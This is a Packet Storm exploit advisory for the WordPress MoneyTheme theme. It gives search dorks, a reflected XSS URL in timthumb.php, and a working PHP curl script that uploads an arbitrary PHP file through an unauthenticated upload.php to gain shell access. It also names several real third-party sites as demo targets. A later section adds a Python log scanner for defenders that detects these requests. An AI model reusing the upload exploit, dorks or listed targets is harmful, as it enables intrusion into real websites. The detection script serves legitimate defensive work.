WordPress MoneyTheme Cross Site Scripting / Shell Upload

2013-10-29T00:00:00
ID PACKETSTORM:123819
Type packetstorm
Reporter DevilScreaM
Modified 2013-10-29T00:00:00

Description

#Title : Wordpress MoneyTheme Themes XSS / Arbitrary File Upload  
  
#Author : DevilScreaM  
  
#Date : 10/27/2013  
  
#Category : Web Applications  
  
#Type : PHP  
  
#Vendor : http://themesjunction.com  
  
#Link : http://themesjunction.com/theme/money_wordpress_template-17129.html  
  
#Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security  
Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber  
  
#Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded |  
  
#Vulnerability : XSS, Arbitrary File Upload  
  
#Dork :   
  
inurl:themes/MoneyTheme/  
inurl:wp-content/themes/MoneyTheme/  
  
  
Cross Site Scripting  
  
Reflected XSS via the 'src' parameter of 'timthumb.php'  
  
http://site-target/wp-content/themes/MoneyTheme/timthumb.php?src=[XSS].jpg  
  
Example :  
  
http://cheapcompoundbow.com/wp-content/themes/MoneyTheme/timthumb.php?src=<h1>DevilScreaM</h1>.jpg  
  
  
====================================================================================================  
  
Arbitrary File Upload  
  
Exploit :  
  
<?php   
  
$uploadfile="devilscream.php";   
  
$ch = curl_init("http://site-target/wp-content/themes/MoneyTheme/uploads/upload.php?folder=/wp-content/themes/MoneyTheme/uploads/uploads/");   
curl_setopt($ch, CURLOPT_POST, true);   
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile"));   
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);   
$postResult = curl_exec($ch);   
curl_close($ch);   
print "$postResult";   
  
?>  
  
  
Shell Access : http://site-target/wp-content/themes/MoneyTheme/uploads/uploads/devilscream.php   
  
devilscream.php  
<?php   
phpinfo();   
?>  
  
Demo :  
  
http://wellontop.com/wp-content/themes/MoneyTheme/uploads/upload.php   
http://copiouscash.com/wp-content/themes/MoneyTheme/uploads/upload.php  
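For defenders, the two issues above (markup reflected through the `src` parameter of `timthumb.php`, and unauthenticated POSTs to `uploads/upload.php` followed by requests for `.php` files under `uploads/uploads/`) are easy to spot in web server access logs. The following Python script is an added example written for this page; it is not part of the advisory or of the theme. It assumes Apache/nginx combined log format, the log lines embedded in it are constructed for illustration (the paths are the ones named in the advisory), and the finding names are my own labels.

```python
"""Flag requests matching the MoneyTheme timthumb.php XSS and
uploads/upload.php arbitrary-file-upload patterns in combined-format logs.

Added example, not part of the original advisory. Log lines are constructed.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Combined log format: ip ident user [time] "METHOD target HTTP/x" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

THEME = "/wp-content/themes/MoneyTheme"
UPLOAD_HANDLER = THEME + "/uploads/upload.php"      # unauthenticated upload script
UPLOAD_DIR = THEME + "/uploads/uploads/"            # where upload.php writes files


def parse_line(line):
    """Return ip/method/path/query/status for one log line, or None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    return {
        "ip": m.group("ip"),
        "method": m.group("method"),
        "path": parts.path,
        "query": parse_qs(parts.query),
        "status": int(m.group("status")),
    }


def classify(rec):
    """Map one parsed request to a finding label, or None if it looks benign."""
    path = rec["path"]
    # 1. Reflected XSS probe: markup (or its URL-encoding) inside timthumb's src=.
    if path.endswith("/timthumb.php"):
        for src in rec["query"].get("src", []):
            if re.search(r"[<>\"']|%3c|%3e", unquote(src), re.I):
                return "timthumb_xss_probe"
        return None
    # 2. Any POST to the theme's upload script is an upload attempt; a folder=
    #    value pointing outside the theme directory is an extra red flag.
    if path == UPLOAD_HANDLER and rec["method"] == "POST":
        folder = rec["query"].get("folder", [""])[0]
        if folder and not folder.startswith(THEME):
            return "upload_outside_theme"
        return "theme_upload_attempt"
    # 3. A .php file being served from the upload directory is a likely web shell.
    if path.startswith(UPLOAD_DIR) and path.lower().endswith(".php"):
        return "php_in_upload_dir"
    return None


def scan(lines):
    """Return a list of (ip, finding, path) tuples for every suspicious request."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        finding = classify(rec)
        if finding:
            hits.append((rec["ip"], finding, rec["path"]))
    return hits


# Constructed sample log: one attacker IP walking through both issues,
# plus a second IP making legitimate requests that must not be flagged.
SAMPLE_LOG = [
    '203.0.113.5 - - [27/Oct/2013:10:01:02 +0000] "GET /wp-content/themes/MoneyTheme/timthumb.php?src=%3Ch1%3Ex%3C/h1%3E.jpg HTTP/1.1" 400 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [27/Oct/2013:10:01:30 +0000] "POST /wp-content/themes/MoneyTheme/uploads/upload.php?folder=/wp-content/themes/MoneyTheme/uploads/uploads/ HTTP/1.1" 200 87 "-" "curl/7.26.0"',
    '203.0.113.5 - - [27/Oct/2013:10:01:45 +0000] "GET /wp-content/themes/MoneyTheme/uploads/uploads/devilscream.php HTTP/1.1" 200 16432 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [27/Oct/2013:10:02:00 +0000] "GET /wp-content/themes/MoneyTheme/timthumb.php?src=http://example.org/a.jpg&w=100 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [27/Oct/2013:10:02:10 +0000] "GET /wp-content/themes/MoneyTheme/uploads/uploads/photo.jpg HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, finding, path in scan(SAMPLE_LOG):
        print(f"{ip}  {finding:22s}  {path}")
```

Run it against a real log with `scan(open("access.log").readlines())`. The third rule is the most useful one after the fact: a 200 response for a `.php` file under `uploads/uploads/` means a file was both written and executed, so the fix is not just to remove the theme's upload script but to remove or quarantine every PHP file in that directory and deny PHP execution there at the web server level.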